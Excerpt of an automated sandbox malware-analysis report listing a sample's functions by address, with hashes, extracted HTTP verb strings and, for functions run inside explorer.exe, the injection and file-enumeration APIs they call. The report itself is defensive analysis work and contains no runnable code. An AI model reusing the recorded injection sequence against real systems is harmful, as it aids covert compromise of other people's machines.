API ID: lstrcmp
String ID:
API String ID: 1534048567-0
Opcode ID: a7d7722e60b770edd55553779d08a273fb261ae12c3b358e198c92cff88732ac
Instruction ID: 9e6827789e2b10e59e59729197ff4810d6b6548db77361bfe6b4b8ef6e84e384
Opcode Fuzzy Hash: a7d7722e60b770edd55553779d08a273fb261ae12c3b358e198c92cff88732ac
Instruction Fuzzy Hash: 5E61B27161CB498FC769CF09E48257AB7F1FB99714F10466EE49A83311DB34E886CB82

Uniqueness

Uniqueness Score: 0.90%

Non-executed Functions

Function 003D52A4, Relevance: 8.1, Strings: 6, Instructions: 646COMMON

Download Yara Rule

Strings

OPTI, xrefs: 003D52F8
GET , xrefs: 003D52E0
POST, xrefs: 003D52F0
OPTI, xrefs: 003D5604
PUT , xrefs: 003D52E8
GET , xrefs: 003D55FC

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID: GET $GET $OPTI$OPTI$POST$PUT
API String ID: 0-647159250
Opcode ID: 3514f21459647fca35b55738f73d72a60908d17867d4550548a6cf859d0752f9
Instruction ID: dffd2887f6b049a902c7b4829ae02d73c4ad2ab2ee1feded7f86b6cc6b35e425
Opcode Fuzzy Hash: 3514f21459647fca35b55738f73d72a60908d17867d4550548a6cf859d0752f9
Instruction Fuzzy Hash: 2D12A631618F058FD72AEF28E8856A6B3E1FBA8301F55452ED48BC7251DF34E846CB81

Uniqueness

Uniqueness Score: 4.31%

Function 003DC380, Relevance: 4.1, Strings: 3, Instructions: 358COMMON

Download Yara Rule

Strings

rGet, xrefs: 003DC473
rLoa, xrefs: 003DC446
~, xrefs: 003DC5E2

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID: rGet$rLoa$~
API String ID: 0-56615508
Opcode ID: 6e86cc886ac250114258902b74e167f175f7a72bea50766b4f14bf808713f4cb
Instruction ID: 453a5d260629c64e1123db215bbab792b804e975f32b90a0627d37f188369f2c
Opcode Fuzzy Hash: 6e86cc886ac250114258902b74e167f175f7a72bea50766b4f14bf808713f4cb
Instruction Fuzzy Hash: 17A11831638A0A4BC72ADF29E8917B673E1FB95310F15516ED48BC7351EA35E843C781

Uniqueness

Uniqueness Score: 8.94%

Function 003C4B30, Relevance: 2.9, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

HTTP, xrefs: 003C4B65
POST, xrefs: 003C4B6D

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID: HTTP$POST
API String ID: 0-4028717631
Opcode ID: cdd9579d7d9d0e2352a4476e25971d0fa9d61270c0659d62f49116e11f338cc9
Instruction ID: 77ac075c4d0e95a6583434f65611fabb154cb1fffae10ad0086609c2396b8d44
Opcode Fuzzy Hash: cdd9579d7d9d0e2352a4476e25971d0fa9d61270c0659d62f49116e11f338cc9
Instruction Fuzzy Hash: EAD1A330318B199FDB69EF28D894BA9B3E1FB58700B51851EE48AC7655CF30EC52CB81

Uniqueness

Uniqueness Score: 4.65%

Function 003C8598, Relevance: 2.2, Strings: 1, Instructions: 959UNIQUE

Download Yara Rule

Strings

jAfr, xrefs: 003C8805

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID: jAfr
API String ID: 0-2301359037
Opcode ID: 57103389e328865b5a80a35a16d3113ce633ed12714c80a16baa4988b87dd154
Instruction ID: ba6b3777239d0d826d0223e378aa4d33c688bec5ee351bafce388d427f50fbd4
Opcode Fuzzy Hash: 57103389e328865b5a80a35a16d3113ce633ed12714c80a16baa4988b87dd154
Instruction Fuzzy Hash: D0720D30618B448FDB79DF28C895B6AB7E6FBD8301F15892EE18AC3254DF71D9418B42

Uniqueness

Uniqueness Score: 100.00%

Function 003CCAA4, Relevance: 2.2, Strings: 1, Instructions: 924COMMON

Download Yara Rule

Strings

W, xrefs: 003CCB06

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 6e6916fc2852e33ae63e5ad741f5cd50e138203b39b566045dc94dbcaf13123c
Instruction ID: 515b1c455e9c65651c6aaf6e4158655d7e8c71a59c626411bbed236dbff05b85
Opcode Fuzzy Hash: 6e6916fc2852e33ae63e5ad741f5cd50e138203b39b566045dc94dbcaf13123c
Instruction Fuzzy Hash: 8542B531718A584FDB65EF68DCC9AA973E2E798301F15453EE88BC3251DE34ED068782

Uniqueness

Uniqueness Score: 1.37%

Function 003D3C7C, Relevance: 2.1, Strings: 1, Instructions: 852COMMON

Download Yara Rule

Strings

@, xrefs: 003D3FF0

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9956d9e7f4daabf6446dc60ade4eea6ffc0207270108d26d0f0bb4a0deb61a0f
Instruction ID: 12145621dd01f25c39c378d18f2f2ea634514ed73ba4ac03ed4161c31a8ad6be
Opcode Fuzzy Hash: 9956d9e7f4daabf6446dc60ade4eea6ffc0207270108d26d0f0bb4a0deb61a0f
Instruction Fuzzy Hash: 8C52A731618B498FD769DF28E8957AAB7E1FB98301F41852EE44BC32A1DF34D941CB42

Uniqueness

Uniqueness Score: 0.02%

Function 003DD03C, Relevance: 1.8, Strings: 1, Instructions: 511UNIQUE

Download Yara Rule

Strings

'Xr, xrefs: 003DD3A0

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID: 'Xr
API String ID: 0-3660879455
Opcode ID: 4e54c2b8c1b41d5d24396fef39913030475b214fc68e1d0cfb3d585ee9d81404
Instruction ID: 706215cb07786a800645cef0abc37e77e725457d9dce8b12caf3a31f9529d53f
Opcode Fuzzy Hash: 4e54c2b8c1b41d5d24396fef39913030475b214fc68e1d0cfb3d585ee9d81404
Instruction Fuzzy Hash: 86F16331714E058FEB59EB39FC95AAA73E7FBD8311B44842A980AC7364DE38D845CB41

Uniqueness

Uniqueness Score: 100.00%

Function 003CF40C, Relevance: 1.6, Strings: 1, Instructions: 346COMMON

Download Yara Rule

Strings

vids, xrefs: 003CF512

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID: vids
API String ID: 0-3767230166
Opcode ID: d7279abbaf0749257a5747332791e2582ff022a3a4708a41fee5d62260338fab
Instruction ID: 354d5581c604815594cc220a30183e96c423d2c1283c176d40cad7cce11239dd
Opcode Fuzzy Hash: d7279abbaf0749257a5747332791e2582ff022a3a4708a41fee5d62260338fab
Instruction Fuzzy Hash: 75C18D316187848FD72AEF28C455BAAB7E1FBD5351F11492EE48AC7251DB34DC01CB82

Uniqueness

Uniqueness Score: 6.12%

Function 003E4918, Relevance: 1.6, Strings: 1, Instructions: 325COMMON

Download Yara Rule

Strings

P, xrefs: 003E49B7

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: b6e59a0eaf58957574999116e5cd990ec13f8aa4ae547859b6ea600007767770
Instruction ID: ed15cb58f6e3cf40a9a1961bd630045f7ed024314bcc491a3160b9f7dd3de940
Opcode Fuzzy Hash: b6e59a0eaf58957574999116e5cd990ec13f8aa4ae547859b6ea600007767770
Instruction Fuzzy Hash: A8A1D33061CA498FEB55EF69D8997AA73E5FB98301F11412ED48EC3291DF38D841CB42

Uniqueness

Uniqueness Score: 0.70%

Function 003D2EF8, Relevance: 1.0, Instructions: 982COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2974c03c15af00f251e67344be44a09df676e95d2e7682ec93f651320e5b2e3b
Instruction ID: 8c90138a3825332117778f2a573bee322905e84af365f2e39acbbbb4e76ce6b9
Opcode Fuzzy Hash: 2974c03c15af00f251e67344be44a09df676e95d2e7682ec93f651320e5b2e3b
Instruction Fuzzy Hash: 56427B767B82804B974CC918DCA36F932DAE7C630E71CA43DE9C7C6247EA29D5078948

Uniqueness

Uniqueness Score: 0.00%

Function 003C25BC, Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd91008ec85894687ff9ecdb94df49fd0cee68a67a8377a8528b01e86ac4350f
Instruction ID: 0be310dd3b8634434a9755381a61febb2a303ea839b61eb4e29454b4d9b83d95
Opcode Fuzzy Hash: bd91008ec85894687ff9ecdb94df49fd0cee68a67a8377a8528b01e86ac4350f
Instruction Fuzzy Hash: B0D17435218A088FDB69EF28D885B6AB3E1FB95300F25456DE44BC3265DF34EC46CB42

Uniqueness

Uniqueness Score: 0.00%

Function 003E5C90, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a03f4b9b601013f4cc84932a5d7d442e57cf64f35b5a19cccd664403dabd9e
Instruction ID: 0064f072d9179f7b321dd0541a1e00c9ce197b8ab40b41dccd8115320f754650
Opcode Fuzzy Hash: 61a03f4b9b601013f4cc84932a5d7d442e57cf64f35b5a19cccd664403dabd9e
Instruction Fuzzy Hash: 7FE19530608A98CFEB65EF15DC49AAA77E1FBD8355F11462DE48AC3160DF34D941CB82

Uniqueness

Uniqueness Score: 0.00%

Function 003E0904, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e82027338e5459657113cb3fcf4b04ebc2aa8c4be56984b65b4a2f8e38e3fb
Instruction ID: 4f25eb2cf348ce7d20dddf631aa5800f13f4232ad94571aa5eb8b6b8327da2d3
Opcode Fuzzy Hash: 18e82027338e5459657113cb3fcf4b04ebc2aa8c4be56984b65b4a2f8e38e3fb
Instruction Fuzzy Hash: CFC1BF30218A558FDB5DDB29D4997AAB3E5FB94305F20472DE48BC3580DB74E892CB82

Uniqueness

Uniqueness Score: 0.00%

Function 003D7BE4, Relevance: .4, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faa986d448226bb70e185c8c19ac6c1419973ce438758e523035a9757639bfbd
Instruction ID: 68cc07164d9939432dc4bfa739059f7980d30f5a5f04e012423ac79e7a1fc8a0
Opcode Fuzzy Hash: faa986d448226bb70e185c8c19ac6c1419973ce438758e523035a9757639bfbd
Instruction Fuzzy Hash: 1FC14131708B488FDB65EF29D8987AA77E2FB98301F55852EE44EC3261DB34D845CB42

Uniqueness

Uniqueness Score: 0.00%

Function 003C9774, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 35807156cba48015ba964e6166014386f632e1c692494212b4c67617f607e87a
Instruction ID: 2f5b39503112900327caa358c661e9340026d46696156139165f3685a794c846
Opcode Fuzzy Hash: 35807156cba48015ba964e6166014386f632e1c692494212b4c67617f607e87a
Instruction Fuzzy Hash: 8FA18431618A488FD779EF2CD889B6973D2F798700F66852ED48FC3255DE34AC468782

Uniqueness

Uniqueness Score: 0.00%

Function 003E8F74, Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 158d5f7b13d328eb0b78e4ff85916a7a56c74ad1b3b5be48d0d892a530a4613c
Instruction ID: bdd0803746bab73e7db69ad3fe64c67026d6f92b59e389b21e577f1058ed59da
Opcode Fuzzy Hash: 158d5f7b13d328eb0b78e4ff85916a7a56c74ad1b3b5be48d0d892a530a4613c
Instruction Fuzzy Hash: 62A1943160CA188FEB49EF29E898A6977E5FB98301F04463EE44BC3265DF38D945CB41

Uniqueness

Uniqueness Score: 0.00%

Function 003C1BD8, Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb35d48c71e76b8bad92eecc33ebe50439a56691800f2d7f6fc6652ddf5d694
Instruction ID: d5d0d54ef217a517775a9d8ff24992ba47ca220eabdb5144053254111d3f813d
Opcode Fuzzy Hash: 5bb35d48c71e76b8bad92eecc33ebe50439a56691800f2d7f6fc6652ddf5d694
Instruction Fuzzy Hash: 5DB1B130618B098FDB65DF1CD885B66B7E5FB99311F50852DE88AC3251DB34EC42DB82

Uniqueness

Uniqueness Score: 0.00%

Function 003DFA9C, Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 722fc47525c78b041378e6ab1fd1b6d0561ad97734b7285ffe56f0d7def8356e
Instruction ID: 7a204082aa946114c8be22aec87dde0348093411bd8c653c6880db8cd05f2a6a
Opcode Fuzzy Hash: 722fc47525c78b041378e6ab1fd1b6d0561ad97734b7285ffe56f0d7def8356e
Instruction Fuzzy Hash: 66A1D031218A494FEB59EF2CE8C576977E6FB98300F44412EE88BC7396DA34D845CB81

Uniqueness

Uniqueness Score: 0.00%

Function 003E4014, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 988c5325fec45c253a23247fa4365cc932337930e0dc0bb1138f2b4094cd720b
Instruction ID: 6c1b3d51967d3717b186e55e880c6195f15ebec6838fdc90cc9197d04c96006a
Opcode Fuzzy Hash: 988c5325fec45c253a23247fa4365cc932337930e0dc0bb1138f2b4094cd720b
Instruction Fuzzy Hash: 3F712231618F494FDB59EF6DE88A626B3D1FBAC310B45467EE80AC7291DE34EC418781

Uniqueness

Uniqueness Score: 0.00%

Function 003D5D34, Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9b930c4329a53b8febbace28c5a1bbcc3a9ecab788506a6ae30ba10f82bba7e
Instruction ID: 811db537e57a4cf0b2bad0b84bb7412ae92bb3ddcc9ed5973b1c48a75cb6497d
Opcode Fuzzy Hash: e9b930c4329a53b8febbace28c5a1bbcc3a9ecab788506a6ae30ba10f82bba7e
Instruction Fuzzy Hash: 8A81813160DF588FDB29EF58EC896AAB7E5EBD4701F11862ED44AC3251DF74D8018782

Uniqueness

Uniqueness Score: 0.00%

Function 003D4800, Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f002bc3ca4e9e2b4554369f9406f726bcefa7eff38c154e32abd8f6fd19e88ad
Instruction ID: b8ddb9bdcd1e9df9e99d99c628ebeefcccc3cfd04f89518028e7eefad4d335fd
Opcode Fuzzy Hash: f002bc3ca4e9e2b4554369f9406f726bcefa7eff38c154e32abd8f6fd19e88ad
Instruction Fuzzy Hash: 4D81623121CB488FDB55EF69E899A6AB7F1FB98300B01852EE44AC7255DF34ED41CB81

Uniqueness

Uniqueness Score: 0.00%

Function 003E8854, Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7157a31bce5d34156eaf2dcf6e3c3a4a9510ff7fbc156ff8d0570ff26ec552
Instruction ID: 2f32dc539d09c64fd310a496a06c8427e6e536116a7430ac08d5a49cc7725cae
Opcode Fuzzy Hash: 9b7157a31bce5d34156eaf2dcf6e3c3a4a9510ff7fbc156ff8d0570ff26ec552
Instruction Fuzzy Hash: DE718331A14A684FDB5AEF1ED89576533D1FB54340B0541AAEC4ECB29BDF34DC418B82

Uniqueness

Uniqueness Score: 0.00%

Function 003DA43C, Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50ebb97b1cf3abe6d0d683cf0733409feb2d48bb3eef645db75a6e9f3de0b413
Instruction ID: b001ec87714c25d35c0e33d9bee69feebf2e6b0acd1594fbdbf278451fd728b2
Opcode Fuzzy Hash: 50ebb97b1cf3abe6d0d683cf0733409feb2d48bb3eef645db75a6e9f3de0b413
Instruction Fuzzy Hash: 6B61B63261CE584FD75EAB28B84567A73D6FB95311B15412EE88BD7341EE30EC4287C2

Uniqueness

Uniqueness Score: 0.00%

Function 003CECFC, Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4aefc8cd049c888e9011e6b4d732bbbbee08783c03ee611b7d78943dfd08760
Instruction ID: de415ab504513ca4a5f9b50f495815e778beb6bb5478ed18570ff43e7beeb7ad
Opcode Fuzzy Hash: c4aefc8cd049c888e9011e6b4d732bbbbee08783c03ee611b7d78943dfd08760
Instruction Fuzzy Hash: 9B718331618B488FE754EF6DDC89A66B7E1FB98711F11862EE449C3210DB78ED41CB82

Uniqueness

Uniqueness Score: 0.00%

Function 003C3BD4, Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e7cbb4a352be44735db5e99acae208f66bc2f40fad81abd69260c4d1e058179
Instruction ID: 2933afa5139eb6d21642c6c2dc06be42d8928ec8ca9bb24491fb7e04275e2e75
Opcode Fuzzy Hash: 6e7cbb4a352be44735db5e99acae208f66bc2f40fad81abd69260c4d1e058179
Instruction Fuzzy Hash: CF714435718A488FDB69EF38DC89A2977E1F798700B65842DE04BC3261DE34DD46CB82

Uniqueness

Uniqueness Score: 0.00%

Function 003DC078, Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: b3cd81cd7b59ae22540f2f4922b52e8c8db666a141f9836bf72371d99640b405
Instruction ID: 2089bef6f2d871bf5018db998eb54d75cfd25af3f345ecc64ec7e1fd1e3d2604
Opcode Fuzzy Hash: b3cd81cd7b59ae22540f2f4922b52e8c8db666a141f9836bf72371d99640b405
Instruction Fuzzy Hash: E771B432628B068FDB65EF68E8C5BA677E5FB98300F41852EE44AC3251DF35D941CB41

Uniqueness

Uniqueness Score: 0.00%

Function 003DEE94, Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b239c295f9f4633e8fdb43983b0c6dc90214b0cb816e9460e1b556267b1cc9b8
Instruction ID: 4b262bd509b7936d6c111ddf9df80bd12a67850be53c28be3d14e11c9451f7d7
Opcode Fuzzy Hash: b239c295f9f4633e8fdb43983b0c6dc90214b0cb816e9460e1b556267b1cc9b8
Instruction Fuzzy Hash: 28619431718A088FDB54EF68A88866977E2FBD8301F15853EE48BC3261DF38D946C742

Uniqueness

Uniqueness Score: 0.00%

Function 003D5A4C, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afab6f03cd843281b1c627aa27bce71b05449d6f560ac3b2d3f547f60271d99d
Instruction ID: 58a9c1d8ea28596acb41836343a411a4b674240220a63525e2d259de324bc1dd
Opcode Fuzzy Hash: afab6f03cd843281b1c627aa27bce71b05449d6f560ac3b2d3f547f60271d99d
Instruction Fuzzy Hash: 92519431718E0D4FAB59EF6DAC9AA7937D3E7D8701305812AA40AC7365DE39EC428781

Uniqueness

Uniqueness Score: 0.00%

Function 003DDBB4, Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.927740413.00000000003C1000.00000020.00000001.sdmp, Offset: 003C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3c1000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c9f6faaa37e9247acfad11c7ef4a89bed5bded4929af5b50f960f1a885f26b
Instruction ID: 37ef57c5d8b83961ca5774448a81684ee06043ef8a3cabf84bde79cae6434413
Opcode Fuzzy Hash: 15c9f6faaa37e9247acfad11c7ef4a89bed5bded4929af5b50f960f1a885f26b
Instruction Fuzzy Hash: 3F61B631518B498FDB69EF28E8987AA77E1FF94315F11492EE48AC3260DF35C541CB82

Uniqueness

Uniqueness Score: 0.00%

Analysis Process: explorer.exe PID: 3760 Parent PID: 4404 explorer.exeUNIQUE

Executed Functions

Function 05377BE4, Relevance: 13.9, APIs: 9, Instructions: 365
filememoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 05377C1E
FindFirstFileW.KERNEL32 ref: 05377CEE
FindNextFileW.KERNELBASE ref: 05377E5D
FindClose.KERNEL32 ref: 05377E88
FindFirstFileW.KERNEL32 ref: 05377EB8
FindNextFileW.KERNELBASE ref: 05377F93
FindClose.KERNEL32 ref: 05377FC0
RtlDeleteBoundaryDescriptor.NTDLL ref: 05377FD7
RtlReleasePrivilege.NTDLL ref: 05378002

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext$AllocateBoundaryDeleteDescriptorHeapPrivilegeRelease
String ID:
API String ID: 2597896944-0
Opcode ID: faa986d448226bb70e185c8c19ac6c1419973ce438758e523035a9757639bfbd
Instruction ID: 4dcea99f9e8eecc33e8e805f37b96835c48910b93c6f60f3e8d5110d5516ea6e
Opcode Fuzzy Hash: faa986d448226bb70e185c8c19ac6c1419973ce438758e523035a9757639bfbd
Instruction Fuzzy Hash: D8C13030708B488FDB64EF28D8987AA77E2FB98301F548529E44EC3261DB78D945CB42

Uniqueness

Uniqueness Score: 100.00%

Function 05372348, Relevance: 7.7, APIs: 5, Instructions: 178
threadnativeinjectionUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationProcess.NTDLL ref: 053723E7
CreateRemoteThread.KERNEL32 ref: 053724AB
ResumeThread.KERNEL32 ref: 053724E3
FindCloseChangeNotification.KERNEL32 ref: 053724EE
FindCloseChangeNotification.KERNEL32 ref: 05372516

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: ChangeCloseFindNotificationThread$CreateInformationProcessRemoteResume
String ID:
API String ID: 3814283479-0
Opcode ID: 98a833d960eaf6928bfee9de1a378e0f99c7b5891b2d68612c3912fdc27538f9
Instruction ID: b3c31aa4cb4d1371155ded3a0c6878d3af92189eeabb9e94b096bdf34e58d3c2
Opcode Fuzzy Hash: 98a833d960eaf6928bfee9de1a378e0f99c7b5891b2d68612c3912fdc27538f9
Instruction Fuzzy Hash: 15518334B08B098FE774EB68D899766B7E6FB99315F00842DE54AC3251EB78D841CB42

Uniqueness

Uniqueness Score: 100.00%

Function 05386338, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 644
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0538680C

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 29d4938f74e471f91e068dc03725ff5071d19712d6ad2c2d5b0e48b8d003ddeb
Instruction ID: 5f964b0d161338c80385f7bbad062abc9b8f30ab1941c018ff4b1afe209dbc30
Opcode Fuzzy Hash: 29d4938f74e471f91e068dc03725ff5071d19712d6ad2c2d5b0e48b8d003ddeb
Instruction Fuzzy Hash: 84124130718F098FEB69EF28D899A7673E1FBA8301F40462DD45AC3295DF74E9458B81

Uniqueness

Uniqueness Score: 0.02%

Function 0536AEE0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214
nativeUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 0536B082

Part of subcall function 053708F4: NtMapViewOfSection.NTDLL ref: 05370940

Strings

0, xrefs: 0536B076

Memory Dump Source

Source File: 00000014.00000002.982913249.0000000005361000.00000020.00000001.sdmp, Offset: 05361000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5361000_explorer.jbxd

Similarity

API ID: Section$CreateView
String ID: 0
API String ID: 1585966358-4108050209
Opcode ID: 8d3327ad2bdf03cb36c6e95cb58f32ae3bf8030dfbcdd593aad816d0883e06f5
Instruction ID: e4d28c22434d3c7494e5c622a18d54cc03d213f22685dc85c42389a09f3e278d
Opcode Fuzzy Hash: 8d3327ad2bdf03cb36c6e95cb58f32ae3bf8030dfbcdd593aad816d0883e06f5
